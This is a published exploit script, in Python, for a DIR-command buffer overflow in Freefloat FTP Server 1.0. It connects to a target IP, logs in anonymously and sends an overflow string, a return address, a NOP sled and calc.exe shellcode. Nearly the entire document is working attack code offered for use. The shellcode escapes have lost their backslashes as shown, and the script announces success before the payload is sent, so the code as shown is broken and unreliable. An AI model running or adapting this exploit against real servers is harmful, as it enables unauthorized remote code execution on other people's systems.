Freefloat FTP Server 1.0 DIR Buffer Overflow
Posted on 02 November 2016
import socket import sys import os print ''' ############################################## # Created: ScrR1pTK1dd13 # # Name: Greg Priest # # Mail: ScrR1pTK1dd13.slammer@gmail.com # ############################################## # Exploit Title: FreefloatFTPserver1.0_dir_command_remotecode_exploit # Date: 2016.11.02 # Exploit Author: Greg Priest # Version: FreefloatFTPserver1.0 # Tested on: Windows7 x64 HUN/ENG Professional ''' ip = raw_input("Target ip: ") port = 21 overflow = 'A' * 247 eip = 'xF4xAFxEAx75' + 'x90' * 10 #shellcode calc.exe shellcode =( "x31xdbx64x8bx7bx30x8bx7f" + "x0cx8bx7fx1cx8bx47x08x8b" + "x77x20x8bx3fx80x7ex0cx33" + "x75xf2x89xc7x03x78x3cx8b" + "x57x78x01xc2x8bx7ax20x01" + "xc7x89xddx8bx34xafx01xc6" + "x45x81x3ex43x72x65x61x75" + "xf2x81x7ex08x6fx63x65x73" + "x75xe9x8bx7ax24x01xc7x66" + "x8bx2cx6fx8bx7ax1cx01xc7" + "x8bx7cxafxfcx01xc7x89xd9" + "xb1xffx53xe2xfdx68x63x61" + "x6cx63x89xe2x52x52x53x53" + "x53x53x53x53x52x53xffxd7") remotecode = overflow + eip + shellcode + ' ' s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) connect=s.connect((ip ,port)) s.recv(1024) s.send('USER anonymous ') s.recv(1024) s.send('PASSW hacker@hacker.net ') s.recv(1024) print ''' Successfull Exploitation! ''' message = 'dir ' + remotecode s.send(message) s.recv(1024) s.close